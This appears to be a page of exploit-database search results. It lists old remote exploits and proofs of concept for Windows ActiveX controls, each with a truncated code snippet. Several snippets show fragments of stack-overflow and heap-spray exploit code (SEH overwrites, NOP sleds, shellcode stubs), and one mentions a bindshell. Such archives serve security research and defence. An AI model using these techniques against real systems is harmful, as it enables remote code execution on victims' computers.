293 matches found
WebGate eDVR Manager 2.6.4 AudioOnlySiteChannel Stack Buffer Overflow Exploit
Exploit for windows platform in category remote exploits var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...
WebGate WinRDS 2.0.8 PlaySiteAllChannel Stack Buffer Overflow Exploit
Exploit for windows platform in category remote exploits var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...
WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow
WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability 0Day var buff1 = ""; var nops = ""; var buff2 = ""; for i=0;i128; i++ buff1 += "B"; nseh = "\xeb\x08PD"; //pop pop ret = 1007f2a0 0x1007f2...
WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow
WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow var buff1 = ""; var arg2=1; var arg3=1; var arg4=1; var nops = ""; var buff2 = ""; for i=0;i24; i++ buff1 += "B"; // jump over seh to shellcode nseh = "\xeb\x08PD"; // pop pop ret var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops +=...
The use of CVE2012-0 1 5 8 old vulnerability in the latest APT attack V1. 0-vulnerability warning-the black bar safety net
Format overflow vulnerabilities are often APT to attack the use. In such vulnerability, CVE2012-0 1 5 8 over the past year the most often used one. The use of the vulnerability of the carrier is typically an RTF file formats, the internal data in hex string form saved. 2 0 1 3 years 1 month of...
NCTVideoStudio ActiveX DLLs 1.6 - Remote Heap Overflow PoC
No description provided by source. html ----------------------------------------------------------- br/ Author : Mountassif Mouad Stack br/ ----------------------------------------------------------- br/ NCTVideoStudio ActiveX DLLs Version 1.6 Reamote Heap Overflow Poc br/...
EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit
No description provided by source. !-- EMC multiple products KeyWorks KeyHelp Module keyhelp.ocx 1.2.312 remote buffer overflow exploit ie8 xp sp3 by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ tested products: EMC Captiva QuickScan Pro 4.6 sp1 EMC Documentum...
NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow
No description provided by source. $Id: nctaudiofile2setformatlikesample.rb 9668 2010-07-03 01:38:15Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on...
Chilkat Software FTP2 ActiveX Component Remote Code Execution
No description provided by source. !-- Chilkat Software FTP2 ActiveX Component ChilkatFtp2.DLL 2.6.1.1 Remote Code Execution poc by rgod tested against Internet Explorer 7 on Vista should also work with 8/9 ActiveX Settings: CLSID: 302124C4-30A0-484A-9C7A-B51D5BA5306B Progid:...
MS Internet Explorer 5.5 CLSID File Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2612/info The default operation performed to open a filetype is determining by referencing the filetype's CLSID. Due to a flaw in the interpretation of CLSIDs when appended to a filename, it is possible to specify a...
ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit
No description provided by source. !-- Title: ImageShack Toolbar 4.8.3.75 Remote Code Execution Exploit Date: Nov 23, 2010 Author: Rew Email: rew splat leethax.info Link: http://toolbar.imageshack.us/ImageShackToolbar.exe Version: 4.8.3.75 Tested on: WinXP - IE 6 & 7 CVE: NA 0day Note: This objec...
WinZip <= 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)
No description provided by source. !-- prdelka http://blogs.23.nu/prdelka I made a version of my winzip exploit that utilises the heap spray method with a bindshell for some project or other. you can download a copy here if its of use to you, note i used a different method courtesy of...
Internet Download Accelerator 5.2 - Remote Buffer Overflow PoC
No description provided by source. !--========================== ================================================== Internet Explorer ver 6.0 , 7.0 Tested On Winados SP2 DeltahackingSecurityTEAM Bug discovered by Dr.Pantagon Affected Software: idaiehlp.dll IE 4.x-6.x BHO for Internet Download...
America Online ICQ 5.1 ActiveX Control Remote Code Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20930/info The America Online ICQ ActiveX Control is prone to a remote code-execution vulnerability. An attacker could exploit this issue simply by sending a message to a victim ICQ user. Successful exploits could allow t...
LEADTOOLS 11.5.0.9 - (ltdlg11n.ocx) Bitmap Access Violation DoS
No description provided by source. html Test Exploit Page object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' //object script language='vbscript' targetFile = C:\Program Files\Rational\common\ltdlg11n.ocx prototype = Property Let Bitmap As Long memberName = Bitmap progid =...
FlexCell Grid Control 5.6.9 - Remote File Overwrite Exploit
No description provided by source. HTML BODY b Author : Houssamix br/ br/ br/ FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit br/ ExportToXML is vuln to br/ b/ object id=hsmx classid=clsid:2A7D9CCE-211A-4654-9449-718F71ED9644/object SCRIPT / Report for Clsid:...
J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow Exploit
No description provided by source. !-- Exploit Title: J-Integra v2.11 ActiveX SetIdentity Buffer Overflow Exploit Found By: DrIDE Download: http://j-integra.intrinsyc.com/ Greets: bz1p, [email protected] for finding the app. Tested on: XP SP3 IE7 CVE: 0day Notes: This is not the same control as...
McKesson ActiveX File/Environmental Variable Enumeration
No description provided by source. html !-- McKesson ActiveX File/Environmental Variable Enumeration Vendor: McKesson Version: 11.0.10.38 Tested on: Windows XP SP3 / IE Download: N/A Author: Blake Additional Details: This activex control is packaged with the Horizon Rad Station software used by...
Advanced File Vault(eSellerateControl350.dll) Activex Heap Spray 0day
No description provided by source. // Exploit Title: Advanced File VaulteSellerateControl350.dll Activex Heap Spray 0-day // Date: 08-08-2010 // Author: ThE g0bL!N // Version: 0-day // Tested on: xp sp2 html script language=JavaScript defer var sCode =...
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite PoC
No description provided by source. !-- Quest Toad for Oracle Explain Plan Display ActiveX Control QExplain2.dll 6.6.1.1115 Remote File Creation / Overwrite vendor site: http://www.quest.com/ file tested: QuestToad-Development-Suite-for-Oracle110R2.exe CLSID: F7014877-6F5A-4019-A3B2-74077F2AE126...